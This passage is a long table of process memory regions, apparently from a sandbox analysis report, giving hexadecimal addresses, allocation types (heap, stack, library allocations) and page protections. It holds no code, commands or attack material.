||
|
1F4C9A62000
|
trusted library allocation
|
page read and write
|
||
|
9452AFF000
|
stack
|
page read and write
|
||
|
1FFC5308000
|
heap
|
page read and write
|
||
|
221CDA22000
|
heap
|
page read and write
|
||
|
1F4C6F30000
|
heap
|
page read and write
|
||
|
1DBD5F10000
|
heap
|
page read and write
|
||
|
7FF7DF11B000
|
unkown
|
page write copy
|
||
|
D282F7E000
|
stack
|
page read and write
|
||
|
1D8E78E9000
|
heap
|
page read and write
|
||
|
196B0FF000
|
stack
|
page read and write
|
||
|
2A3207A1000
|
heap
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
20E69190000
|
heap
|
page read and write
|
||
|
2713D200000
|
heap
|
page read and write
|
||
|
64950000
|
unkown
|
page read and write
|
||
|
7FF847BE0000
|
trusted library allocation
|
page read and write
|
||
|
1FFC5308000
|
heap
|
page read and write
|
||
|
224FC8E000
|
stack
|
page read and write
|
||
|
1F4CA6FA000
|
trusted library allocation
|
page read and write
|
||
|
27126458000
|
trusted library allocation
|
page read and write
|
||
|
224FA0C000
|
stack
|
page read and write
|
||
|
7FF8A9391000
|
unkown
|
page readonly
|
||
|
1FFC52AF000
|
heap
|
page read and write
|
||
|
1F4E13E9000
|
heap
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
7FF847C7F000
|
trusted library allocation
|
page read and write
|
||
|
2DEB7390000
|
heap
|
page read and write
|
||
|
7FF74719C000
|
unkown
|
page write copy
|
||
|
1C43773B000
|
heap
|
page read and write
|
||
|
1F4C71D0000
|
heap
|
page read and write
|
||
|
1F4E13F0000
|
heap
|
page read and write
|
||
|
19E377C0000
|
heap
|
page read and write
|
||
|
1FFC5294000
|
heap
|
page read and write
|
||
|
1FFC52DD000
|
heap
|
page read and write
|
||
|
1801B3D7000
|
heap
|
page read and write
|
||
|
2A320558000
|
heap
|
page read and write
|
||
|
34964FF000
|
unkown
|
page read and write
|
||
|
1FFC52F7000
|
heap
|
page read and write
|
||
|
1D6447AB000
|
heap
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
2A3205A8000
|
heap
|
page read and write
|
||
|
1F527930000
|
heap
|
page read and write
|
||
|
2712635C000
|
trusted library allocation
|
page read and write
|
||
|
1FFC52CC000
|
heap
|
page read and write
|
||
|
7FF8A7A80000
|
unkown
|
page readonly
|
||
|
1C437670000
|
heap
|
page read and write
|
||
|
7FF847C86000
|
trusted library allocation
|
page read and write
|
||
|
2A3205CE000
|
heap
|
page read and write
|
||
|
1F4E1000000
|
heap
|
page execute and read and write
|
||
|
AB0D4FF000
|
stack
|
page read and write
|
||
|
18003465000
|
trusted library allocation
|
page read and write
|
||
|
7FF847A5A000
|
trusted library allocation
|
page read and write
|
||
|
7FF7DF116000
|
unkown
|
page write copy
|
||
|
7FF8B83EB000
|
unkown
|
page readonly
|
||
|
27122F60000
|
heap
|
page read and write
|
||
|
7FF747163000
|
unkown
|
page readonly
|
||
|
2A32053D000
|
heap
|
page read and write
|
||
|
7FF747163000
|
unkown
|
page readonly
|
||
|
18003450000
|
trusted library allocation
|
page read and write
|
||
|
962B4FC000
|
stack
|
page read and write
|
||
|
180012A3000
|
heap
|
page read and write
|
||
|
7FF847A40000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E02000
|
trusted library allocation
|
page read and write
|
||
|
7FF8B8B3E000
|
unkown
|
page read and write
|
||
|
1F4E1056000
|
heap
|
page read and write
|
||
|
AE537FC000
|
stack
|
page read and write
|
||
|
1801B540000
|
heap
|
page read and write
|
||
|
20DCF11B000
|
heap
|
page read and write
|
||
|
1A72D980000
|
heap
|
page read and write
|
||
|
180012E7000
|
heap
|
page read and write
|
||
|
7FF849270000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
27124C33000
|
trusted library allocation
|
page read and write
|
||
|
1F4D8EE0000
|
trusted library allocation
|
page read and write
|
||
|
6C0513E000
|
stack
|
page read and write
|
||
|
6C053BE000
|
stack
|
page read and write
|
||
|
232094C7000
|
heap
|
page read and write
|
||
|
1FFC5500000
|
heap
|
page read and write
|
||
|
1FFC5275000
|
heap
|
page read and write
|
||
|
7FF847956000
|
trusted library allocation
|
page read and write
|
||
|
7FF847A60000
|
trusted library allocation
|
page execute and read and write
|
||
|
AE539FE000
|
stack
|
page read and write
|
||
|
2A320560000
|
heap
|
page read and write
|
||
|
2E63ED7A000
|
heap
|
page read and write
|
||
|
20820B40000
|
heap
|
page read and write
|
||
|
7FF8478AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF8A7EC8000
|
unkown
|
page write copy
|
||
|
682A0000
|
unkown
|
page readonly
|
||
|
7FF848F20000
|
trusted library allocation
|
page execute and read and write
|
||
|
27122F20000
|
heap
|
page read and write
|
||
|
198F1A30000
|
heap
|
page read and write
|
||
|
1F4CA10E000
|
trusted library allocation
|
page read and write
|
||
|
2713CFB3000
|
heap
|
page read and write
|
||
|
6494A000
|
unkown
|
page readonly
|
||
|
ACA9DCD000
|
stack
|
page read and write
|
||
|
1801B397000
|
heap
|
page read and write
|
||
|
1C437730000
|
heap
|
page read and write
|
||
|
2DEB74D0000
|
heap
|
page read and write
|
||
|
23E8AE10000
|
heap
|
page read and write
|
||
|
1FFC52C8000
|
heap
|
page read and write
|
||
|
1FFC52F0000
|
heap
|
page read and write
|
||
|
7FF747101000
|
unkown
|
page execute read
|
||
|
1801B405000
|
heap
|
page read and write
|
||
|
1FDE2970000
|
heap
|
page read and write
|
||
|
16B22E80000
|
heap
|
page read and write
|
||
|
9EEE13B000
|
stack
|
page read and write
|
||
|
1F4E13AB000
|
heap
|
page read and write
|
||
|
20E692D0000
|
heap
|
page read and write
|
||
|
2A320533000
|
heap
|
page read and write
|
||
|
1FFC52E1000
|
heap
|
page read and write
|
||
|
7FF847C2F000
|
trusted library allocation
|
page read and write
|
||
|
2537E0C0000
|
heap
|
page read and write
|
||
|
198F1A68000
|
heap
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
1801B37E000
|
heap
|
page read and write
|
||
|
1F4C6FB8000
|
heap
|
page read and write
|
||
|
7FF847C33000
|
trusted library allocation
|
page read and write
|
||
|
1F4C7018000
|
heap
|
page read and write
|
||
|
7FF8B83E7000
|
unkown
|
page write copy
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
7FF8B8AF0000
|
unkown
|
page readonly
|
||
|
7FF8A7FCE000
|
unkown
|
page readonly
|
||
|
6C04BCE000
|
stack
|
page read and write
|
||
|
1FFC52B7000
|
heap
|
page read and write
|
||
|
7FF8478A2000
|
trusted library allocation
|
page read and write
|
||
|
2A32056E000
|
heap
|
page read and write
|
||
|
1DBD78D0000
|
heap
|
page read and write
|
||
|
7FF747101000
|
unkown
|
page execute read
|
||
|
7FF74719C000
|
unkown
|
page write copy
|
||
|
2A320872000
|
heap
|
page read and write
|
||
|
2537E0D0000
|
heap
|
page read and write
|
||
|
27134EE1000
|
trusted library allocation
|
page read and write
|
||
|
7FF847A90000
|
trusted library allocation
|
page execute and read and write
|
||
|
2713D1A7000
|
heap
|
page read and write
|
||
|
6C052B8000
|
stack
|
page read and write
|
||
|
2712645C000
|
trusted library allocation
|
page read and write
|
||
|
ACA90FC000
|
stack
|
page read and write
|
||
|
26917BB0000
|
heap
|
page read and write
|
||
|
7FF8B8361000
|
unkown
|
page execute read
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
1F4CA22B000
|
trusted library allocation
|
page read and write
|
||
|
6C05E8E000
|
stack
|
page read and write
|
||
|
2A3207F4000
|
heap
|
page read and write
|
||
|
2A320531000
|
heap
|
page read and write
|
||
|
7FF847BF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF8B83E9000
|
unkown
|
page read and write
|
||
|
1FFC529C000
|
heap
|
page read and write
|
||
|
2A3205B7000
|
heap
|
page read and write
|
||
|
23209330000
|
heap
|
page read and write
|
||
|
2A32054D000
|
heap
|
page read and write
|
||
|
1D8E7865000
|
heap
|
page read and write
|
||
|
1FFC52A3000
|
heap
|
page read and write
|
||
|
2437D080000
|
heap
|
page read and write
|
||
|
7FF848E1B000
|
trusted library allocation
|
page read and write
|
||
|
7FF847AA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
1D6447C5000
|
heap
|
page read and write
|
||
|
64953000
|
unkown
|
page write copy
|
||
|
7FF847CB0000
|
trusted library allocation
|
page read and write
|
||
|
1EA7EFF000
|
unkown
|
page read and write
|
||
|
6494E000
|
unkown
|
page readonly
|
||
|
7FF847C2A000
|
trusted library allocation
|
page read and write
|
||
|
18003DAE000
|
trusted library allocation
|
page read and write
|
||
|
5474DFF000
|
unkown
|
page read and write
|
||
|
7FF847950000
|
trusted library allocation
|
page read and write
|
||
|
ACA8F79000
|
stack
|
page read and write
|
||
|
2A320556000
|
heap
|
page read and write
|
||
|
2713CEED000
|
heap
|
page read and write
|
||
|
2A3205DE000
|
heap
|
page read and write
|
||
|
7FF7DF110000
|
unkown
|
page readonly
|
||
|
1D8E7630000
|
heap
|
page read and write
|
||
|
27126477000
|
trusted library allocation
|
page read and write
|
||
|
224FA8A000
|
stack
|
page read and write
|
||
|
7FF848FF2000
|
trusted library allocation
|
page read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page read and write
|
||
|
1FFC52F0000
|
heap
|
page read and write
|
||
|
2A3205DF000
|
heap
|
page read and write
|
||
|
7FF8BA257000
|
unkown
|
page readonly
|
||
|
D28294D000
|
stack
|
page read and write
|
||
|
2E63ED95000
|
heap
|
page read and write
|
||
|
19E37780000
|
heap
|
page read and write
|
||
|
2437D060000
|
heap
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
ACA89EE000
|
stack
|
page read and write
|
||
|
2A320565000
|
heap
|
page read and write
|
||
|
1F4C71C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
2A3205A6000
|
heap
|
page read and write
|
||
|
18002D80000
|
heap
|
page read and write
|
||
|
16B22E75000
|
heap
|
page read and write
|
||
|
922A8FF000
|
stack
|
page read and write
|
||
|
20E69270000
|
heap
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
2713D130000
|
heap
|
page read and write
|
||
|
224EB7D000
|
stack
|
page read and write
|
||
|
221CDA40000
|
heap
|
page read and write
|
||
|
196F24E0000
|
heap
|
page read and write
|
||
|
ACA9E4B000
|
stack
|
page read and write
|
||
|
7FF67A0E0000
|
unkown
|
page readonly
|
||
|
180133CA000
|
trusted library allocation
|
page read and write
|
||
|
7FF847C90000
|
trusted library allocation
|
page read and write
|
||
|
7FF67A0E4000
|
unkown
|
page readonly
|
||
|
1800345B000
|
trusted library allocation
|
page read and write
|
||
|
224FB07000
|
stack
|
page read and write
|
||
|
7FF8A92D1000
|
unkown
|
page execute read
|
||
|
7FF8B83CB000
|
unkown
|
page readonly
|
||
|
2537E160000
|
heap
|
page read and write
|
||
|
18003300000
|
heap
|
page execute and read and write
|
||
|
7DF4FA320000
|
trusted library allocation
|
page execute and read and write
|
||
|
18001500000
|
trusted library allocation
|
page read and write
|
||
|
27124BF0000
|
heap
|
page readonly
|
||
|
1D8E7860000
|
heap
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
7FF849260000
|
trusted library allocation
|
page read and write
|
||
|
1F4C9E9D000
|
trusted library allocation
|
page read and write
|
||
|
1F4CA656000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
1801B350000
|
heap
|
page read and write
|
||
|
2537E4A0000
|
heap
|
page read and write
|
||
|
1F4E1214000
|
heap
|
page read and write
|
||
|
C14F67F000
|
stack
|
page read and write
|
||
|
271264D2000
|
trusted library allocation
|
page read and write
|
||
|
7FF747101000
|
unkown
|
page execute read
|
||
|
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A72D9A4000
|
heap
|
page read and write
|
||
|
221CD950000
|
heap
|
page read and write
|
||
|
8AEA2FE000
|
unkown
|
page read and write
|
||
|
2537E4A5000
|
heap
|
page read and write
|
||
|
7FF849180000
|
trusted library allocation
|
page read and write
|
||
|
7FF8B8AF1000
|
unkown
|
page execute read
|
||
|
2A320790000
|
heap
|
page read and write
|
||
|
27122F6A000
|
heap
|
page read and write
|
||
|
E1092FE000
|
stack
|
page read and write
|
||
|
7FF848FB1000
|
trusted library allocation
|
page read and write
|
||
|
221CDA42000
|
heap
|
page read and write
|
||
|
9EEE4FF000
|
unkown
|
page read and write
|
||
|
224E97F000
|
stack
|
page read and write
|
||
|
7FF849183000
|
trusted library allocation
|
page read and write
|
||
|
64940000
|
unkown
|
page readonly
|
||
|
27124BC0000
|
trusted library allocation
|
page read and write
|
||
|
2A320594000
|
heap
|
page read and write
|
||
|
27122E40000
|
heap
|
page read and write
|
||
|
1F4E122C000
|
heap
|
page read and write
|
||
|
7FF8B83E9000
|
unkown
|
page read and write
|
||
|
922A55D000
|
stack
|
page read and write
|
||
|
1FFC5283000
|
heap
|
page read and write
|
||
|
7DF4F8B60000
|
trusted library allocation
|
page execute and read and write
|
||
|
6C04EFD000
|
stack
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
2002C229000
|
heap
|
page read and write
|
||
|
1801B66E000
|
heap
|
page read and write
|
||
|
7FF747100000
|
unkown
|
page readonly
|
||
|
1D8E7892000
|
heap
|
page read and write
|
||
|
64941000
|
unkown
|
page execute read
|
||
|
1F4CA5C2000
|
trusted library allocation
|
page read and write
|
||
|
7FF8B8B3F000
|
unkown
|
page readonly
|
||
|
1FFC55E2000
|
heap
|
page read and write
|
||
|
6C04AC3000
|
stack
|
page read and write
|
||
|
23E8AEBA000
|
heap
|
page read and write
|
||
|
2A32052F000
|
heap
|
page read and write
|
||
|
7FF8A7F00000
|
unkown
|
page readonly
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
1F4C8E51000
|
trusted library allocation
|
page read and write
|
||
|
2A320872000
|
heap
|
page read and write
|
||
|
18001440000
|
heap
|
page read and write
|
||
|
ACA917E000
|
stack
|
page read and write
|
||
|
196F2150000
|
heap
|
page read and write
|
||
|
20DCF110000
|
heap
|
page read and write
|
||
|
7FF747100000
|
unkown
|
page readonly
|
||
|
27122F28000
|
heap
|
page read and write
|
||
|
180012BD000
|
heap
|
page read and write
|
||
|
2713D190000
|
heap
|
page read and write
|
||
|
224EDB9000
|
stack
|
page read and write
|
||
|
1F4C71B0000
|
heap
|
page readonly
|
||
|
27124D20000
|
heap
|
page read and write
|
||
|
23209410000
|
heap
|
page read and write
|
||
|
ACA92FE000
|
stack
|
page read and write
|
||
|
1F4C89B0000
|
trusted library allocation
|
page read and write
|
||
|
1FFC52A3000
|
heap
|
page read and write
|
||
|
7FF848E5C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FFC5271000
|
heap
|
page read and write
|
||
|
2A320568000
|
heap
|
page read and write
|
||
|
180033EC000
|
trusted library allocation
|
page read and write
|
||
|
20E69465000
|
heap
|
page read and write
|
||
|
1801B516000
|
heap
|
page execute and read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
18001530000
|
heap
|
page read and write
|
||
|
1F4C9F25000
|
trusted library allocation
|
page read and write
|
||
|
2A320542000
|
heap
|
page read and write
|
||
|
18003861000
|
trusted library allocation
|
page read and write
|
||
|
7FF67A0E1000
|
unkown
|
page execute read
|
||
|
2437D0A7000
|
heap
|
page read and write
|
||
|
1FFC52C5000
|
heap
|
page read and write
|
||
|
1800372A000
|
trusted library allocation
|
page read and write
|
||
|
5474EFE000
|
stack
|
page read and write
|
||
|
2712300A000
|
heap
|
page read and write
|
||
|
2537E0F0000
|
heap
|
page read and write
|
||
|
7FF8478A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF847B40000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EC6000
|
trusted library allocation
|
page read and write
|
||
|
1A72D930000
|
heap
|
page read and write
|
||
|
16B22D83000
|
heap
|
page read and write
|
||
|
27124BE0000
|
trusted library allocation
|
page read and write
|
||
|
271264CE000
|
trusted library allocation
|
page read and write
|
||
|
1F4C6F10000
|
heap
|
page read and write
|
||
|
660F1000
|
unkown
|
page read and write
|
||
|
2713D0F0000
|
heap
|
page execute and read and write
|
||
|
221CDA2B000
|
heap
|
page read and write
|
||
|
27123012000
|
heap
|
page read and write
|
||
|
1F4E13A2000
|
heap
|
page read and write
|
||
|
2A320583000
|
heap
|
page read and write
|
||
|
AE536FE000
|
unkown
|
page readonly
|
||
|
18003664000
|
trusted library allocation
|
page read and write
|
||
|
7FF847B80000
|
trusted library allocation
|
page read and write
|
||
|
1FFC5297000
|
heap
|
page read and write
|
||
|
7DF4DD310000
|
trusted library allocation
|
page execute and read and write
|
||
|
18002E35000
|
heap
|
page read and write
|
||
|
7FF747101000
|
unkown
|
page execute read
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
224EF3E000
|
stack
|
page read and write
|
||
|
68281000
|
unkown
|
page execute read
|
||
|
AB0D3FF000
|
unkown
|
page read and write
|
||
|
27134D9E000
|
trusted library allocation
|
page read and write
|
||
|
1F4E1391000
|
heap
|
page read and write
|
||
|
7FF7DF116000
|
unkown
|
page read and write
|
||
|
1F4E0E5E000
|
heap
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
C54B8FE000
|
stack
|
page read and write
|
||
|
20DCF2E0000
|
heap
|
page read and write
|
||
|
2A320560000
|
heap
|
page read and write
|
||
|
1A72D9A6000
|
heap
|
page read and write
|
||
|
2002C450000
|
heap
|
page read and write
|
||
|
1F5277F5000
|
heap
|
page read and write
|
||
|
7FF67A0E4000
|
unkown
|
page readonly
|
||
|
7FF847AD0000
|
trusted library allocation
|
page read and write
|
||
|
20DCF135000
|
heap
|
page read and write
|
||
|
F3B23FC000
|
stack
|
page read and write
|
||
|
1D644900000
|
heap
|
page read and write
|
||
|
660EF000
|
unkown
|
page read and write
|
||
|
2A320593000
|
heap
|
page read and write
|
||
|
7FF848FCA000
|
trusted library allocation
|
page read and write
|
||
|
ACA89AE000
|
stack
|
page read and write
|
||
|
2A320569000
|
heap
|
page read and write
|
||
|
1FFC52ED000
|
heap
|
page read and write
|
||
|
1F4C9E9B000
|
trusted library allocation
|
page read and write
|
||
|
1D8E7B00000
|
heap
|
page read and write
|
||
|
8FD6EFF000
|
stack
|
page read and write
|
||
|
2E63ED10000
|
heap
|
page read and write
|
||
|
2713CF8F000
|
heap
|
page read and write
|
||
|
7FF849240000
|
trusted library allocation
|
page read and write
|
||
|
7FF847C3A000
|
trusted library allocation
|
page read and write
|
||
|
7FF8B8361000
|
unkown
|
page execute read
|
||
|
682A1000
|
unkown
|
page read and write
|
||
|
2A320569000
|
heap
|
page read and write
|
||
|
1D8E7902000
|
heap
|
page read and write
|
||
|
1F4E1252000
|
heap
|
page read and write
|
||
|
1FFC51F0000
|
heap
|
page read and write
|
||
|
221CD960000
|
heap
|
page read and write
|
||
|
1F4E13ED000
|
heap
|
page read and write
|
||
|
7DF4FA310000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E63EFA5000
|
heap
|
page read and write
|
||
|
19E37820000
|
heap
|
page read and write
|
||
|
7FF8BA24F000
|
unkown
|
page readonly
|
||
|
2A3205BE000
|
heap
|
page read and write
|
||
|
660F5000
|
unkown
|
page readonly
|
||
|
1F4E1006000
|
heap
|
page execute and read and write
|
||
|
180033AC000
|
trusted library allocation
|
page read and write
|
||
|
2002C130000
|
heap
|
page read and write
|
||
|
7FF8A812F000
|
unkown
|
page readonly
|
||
|
27126437000
|
trusted library allocation
|
page read and write
|
||
|
7FF847C60000
|
trusted library allocation
|
page read and write
|
||
|
1FFC52BF000
|
heap
|
page read and write
|
||
|
7FF848E12000
|
trusted library allocation
|
page read and write
|
||
|
196F2320000
|
heap
|
page read and write
|
||
|
2A32051C000
|
heap
|
page read and write
|
||
|
1A72DB50000
|
heap
|
page read and write
|
||
|
7FF8BA257000
|
unkown
|
page readonly
|
||
|
1FFC5291000
|
heap
|
page read and write
|
||
|
7641AFF000
|
stack
|
page read and write
|
||
|
180012EA000
|
heap
|
page read and write
|
||
|
7FF848FF8000
|
trusted library allocation
|
page read and write
|
||
|
1F4CA809000
|
trusted library allocation
|
page read and write
|
||
|
1F4C9A44000
|
trusted library allocation
|
page read and write
|
||
|
23209430000
|
heap
|
page read and write
|
||
|
97B70FF000
|
stack
|
page read and write
|
||
|
1FFC530F000
|
heap
|
page read and write
|
||
|
1A72D950000
|
heap
|
page read and write
|
||
|
7FF8BA24F000
|
unkown
|
page readonly
|
||
|
7FF849000000
|
trusted library allocation
|
page execute and read and write
|
||
|
731C2FF000
|
stack
|
page read and write
|
||
|
1D8E7B25000
|
heap
|
page read and write
|
||
|
7FF848FC1000
|
trusted library allocation
|
page read and write
|
||
|
221CDB02000
|
heap
|
page read and write
|
||
|
2A3205B2000
|
heap
|
page read and write
|
||
|
2A3205C7000
|
heap
|
page read and write
|
||
|
2A3205A6000
|
heap
|
page read and write
|
||
|
1F4C9F8A000
|
trusted library allocation
|
page read and write
|
||
|
2A32054F000
|
heap
|
page read and write
|
||
|
1EA7B5C000
|
stack
|
page read and write
|
||
|
224E5D3000
|
stack
|
page read and write
|
||
|
C11D6FF000
|
stack
|
page read and write
|
||
|
1D8E83A0000
|
remote allocation
|
page read and write
|
||
|
588C67F000
|
stack
|
page read and write
|
||
|
1F5277DA000
|
heap
|
page read and write
|
||
|
1A72DD20000
|
heap
|
page read and write
|
||
|
1FFC5279000
|
heap
|
page read and write
|
||
|
6C0507D000
|
stack
|
page read and write
|
||
|
27124850000
|
heap
|
page read and write
|
||
|
1FFC5301000
|
heap
|
page read and write
|
||
|
7FF8491B8000
|
trusted library allocation
|
page read and write
|
||
|
1D8E7710000
|
trusted library allocation
|
page read and write
|
||
|
97B717E000
|
unkown
|
page readonly
|
||
|
2A3205A6000
|
heap
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
2A32054B000
|
heap
|
page read and write
|
||
|
2A32056B000
|
heap
|
page read and write
|
||
|
1FFC529D000
|
heap
|
page read and write
|
||
|
198F1C75000
|
heap
|
page read and write
|
||
|
1FFC527B000
|
heap
|
page read and write
|
||
|
7FF74719C000
|
unkown
|
page read and write
|
||
|
97B6DED000
|
stack
|
page read and write
|
||
|
180037FD000
|
trusted library allocation
|
page read and write
|
||
|
7FF847AE0000
|
trusted library allocation
|
page read and write
|
||
|
224EA7F000
|
stack
|
page read and write
|
||
|
7FF67A0E1000
|
unkown
|
page execute read
|
||
|
1F4C6F00000
|
heap
|
page read and write
|
||
|
7FF847C50000
|
trusted library allocation
|
page read and write
|
||
|
ACA9078000
|
stack
|
page read and write
|
||
|
16B22D60000
|
heap
|
page read and write
|
||
|
2A3205BE000
|
heap
|
page read and write
|
||
|
1CFC8FB000
|
stack
|
page read and write
|
||
|
1FFC52F8000
|
heap
|
page read and write
|
||
|
1F4CAC54000
|
trusted library allocation
|
page read and write
|
||
|
1F4CA1A3000
|
trusted library allocation
|
page read and write
|
||
|
7FF847BA0000
|
trusted library allocation
|
page read and write
|
||
|
198F1A60000
|
heap
|
page read and write
|
||
|
1D8E782B000
|
heap
|
page read and write
|
||
|
76419FF000
|
unkown
|
page read and write
|
||
|
7FF848EBC000
|
trusted library allocation
|
page execute and read and write
|
||
|
ACA8923000
|
stack
|
page read and write
|
||
|
2002C200000
|
heap
|
page read and write
|
||
|
18001260000
|
heap
|
page read and write
|
||
|
ACA8C7E000
|
stack
|
page read and write
|
||
|
2A32055C000
|
heap
|
page read and write
|
||
|
8AE9F3C000
|
stack
|
page read and write
|
||
|
224EAF9000
|
stack
|
page read and write
|
||
|
20E692C0000
|
heap
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
2537E16B000
|
heap
|
page read and write
|
||
|
2A320440000
|
heap
|
page read and write
|
||
|
94529FF000
|
unkown
|
page read and write
|
||
|
27122F68000
|
heap
|
page read and write
|
||
|
2A320548000
|
heap
|
page read and write
|
||
|
7FF847B10000
|
trusted library allocation
|
page read and write
|
||
|
1D6446A0000
|
heap
|
page read and write
|
||
|
8FD6DFF000
|
unkown
|
page read and write
|
||
|
1FFC52A5000
|
heap
|
page read and write
|
||
|
1801B395000
|
heap
|
page read and write
|
||
|
1FFC5275000
|
heap
|
page read and write
|
||
|
2A3207F4000
|
heap
|
page read and write
|
||
|
2A320559000
|
heap
|
page read and write
|
||
|
27124C80000
|
heap
|
page execute and read and write
|
||
|
2713CEE0000
|
heap
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
1F4D8EE8000
|
trusted library allocation
|
page read and write
|
||
|
AE52E7B000
|
stack
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
1F4C6F70000
|
heap
|
page read and write
|
||
|
27124DB3000
|
trusted library allocation
|
page read and write
|
||
|
1F4C9E95000
|
trusted library allocation
|
page read and write
|
||
|
16B22D85000
|
heap
|
page read and write
|
||
|
221CE202000
|
trusted library allocation
|
page read and write
|
||
|
23E8AEC7000
|
heap
|
page read and write
|
||
|
1800129C000
|
heap
|
page read and write
|
||
|
1FFC52DD000
|
heap
|
page read and write
|
||
|
2A3205B2000
|
heap
|
page read and write
|
||
|
2002C110000
|
heap
|
page read and write
|
||
|
1A72DD25000
|
heap
|
page read and write
|
||
|
23209485000
|
heap
|
page read and write
|
||
|
7FF848E3D000
|
trusted library allocation
|
page execute and read and write
|
||
|
27123020000
|
heap
|
page read and write
|
||
|
19E37826000
|
heap
|
page read and write
|
||
|
D28307F000
|
stack
|
page read and write
|
||
|
224EEBE000
|
stack
|
page read and write
|
||
|
7FF7DF111000
|
unkown
|
page execute read
|
||
|
2A3207A0000
|
heap
|
page read and write
|
||
|
1F4C6F6C000
|
heap
|
page read and write
|
||
|
1F4D8E60000
|
trusted library allocation
|
page read and write
|
||
|
1F4C7100000
|
heap
|
page read and write
|
||
|
2713CED0000
|
heap
|
page execute and read and write
|
||
|
27126492000
|
trusted library allocation
|
page read and write
|
||
|
2A32053D000
|
heap
|
page read and write
|
||
|
7FF847B30000
|
trusted library allocation
|
page read and write
|
||
|
AE538FE000
|
unkown
|
page readonly
|
||
|
682EC000
|
unkown
|
page readonly
|
||
|
1D8E784C000
|
heap
|
page read and write
|
||
|
1F4C7140000
|
heap
|
page read and write
|
||
|
18003DC4000
|
trusted library allocation
|
page read and write
|
||
|
1F4CA079000
|
trusted library allocation
|
page read and write
|
||
|
224EC3E000
|
stack
|
page read and write
|
||
|
5474CFC000
|
stack
|
page read and write
|
||
|
2A32052E000
|
heap
|
page read and write
|
||
|
198F1A10000
|
heap
|
page read and write
|
||
|
27126A10000
|
trusted library allocation
|
page read and write
|
||
|
2713D22D000
|
heap
|
page read and write
|
||
|
7FF8A7DCB000
|
unkown
|
page readonly
|
||
|
7FF8A7A81000
|
unkown
|
page execute read
|
||
|
16B22EC0000
|
heap
|
page read and write
|
||
|
ACA8D7D000
|
stack
|
page read and write
|
||
|
18003DE9000
|
trusted library allocation
|
page read and write
|
||
|
20E69460000
|
heap
|
page read and write
|
||
|
1FFC527E000
|
heap
|
page read and write
|
||
|
18003377000
|
trusted library allocation
|
page read and write
|
||
|
18003824000
|
trusted library allocation
|
page read and write
|
||
|
2A3205DE000
|
heap
|
page read and write
|
||
|
1EA7FFF000
|
stack
|
page read and write
|
||
|
7FF7471A6000
|
unkown
|
page readonly
|
||
|
C11D5FF000
|
stack
|
page read and write
|
||
|
7FF847C04000
|
trusted library allocation
|
page read and write
|
||
|
1F4E1210000
|
heap
|
page read and write
|
||
|
1F4C6FB5000
|
heap
|
page read and write
|
||
|
7FF8478A4000
|
trusted library allocation
|
page read and write
|
||
|
1CFC9FF000
|
unkown
|
page read and write
|
||
|
7FF8A92D0000
|
unkown
|
page readonly
|
||
|
1D8E7840000
|
heap
|
page read and write
|
||
|
26917BD0000
|
heap
|
page read and write
|
||
|
1F4E1218000
|
heap
|
page read and write
|
||
|
1FFC5522000
|
heap
|
page read and write
|
||
|
AE534FE000
|
unkown
|
page readonly
|
||
|
7FF67A0E2000
|
unkown
|
page readonly
|
||
|
7FF8478BB000
|
trusted library allocation
|
page read and write
|
||
|
221CDA13000
|
heap
|
page read and write
|
||
|
180033D3000
|
trusted library allocation
|
page read and write
|
||
|
7FF847A82000
|
trusted library allocation
|
page read and write
|
||
|
1FFC52F0000
|
heap
|
page read and write
|
||
|
1F4E0FF0000
|
trusted library allocation
|
page read and write
|
||
|
1F5278D0000
|
heap
|
page read and write
|
||
|
7FF8A7EC6000
|
unkown
|
page write copy
|
||
|
7FF847C00000
|
trusted library allocation
|
page read and write
|
||
|
7FF847CD0000
|
trusted library allocation
|
page read and write
|
||
|
1FFC5521000
|
heap
|
page read and write
|
||
|
2713D224000
|
heap
|
page read and write
|
||
|
7FF67A0E0000
|
unkown
|
page readonly
|
||
|
1DBD5F50000
|
heap
|
page read and write
|
||
|
731C0FC000
|
stack
|
page read and write
|
||
|
1F4E13FD000
|
heap
|
page read and write
|
||
|
2A3205BD000
|
heap
|
page read and write
|
||
|
7FF848E13000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF8491BC000
|
trusted library allocation
|
page read and write
|
||
|
1C437650000
|
heap
|
page read and write
|
||
|
198F1930000
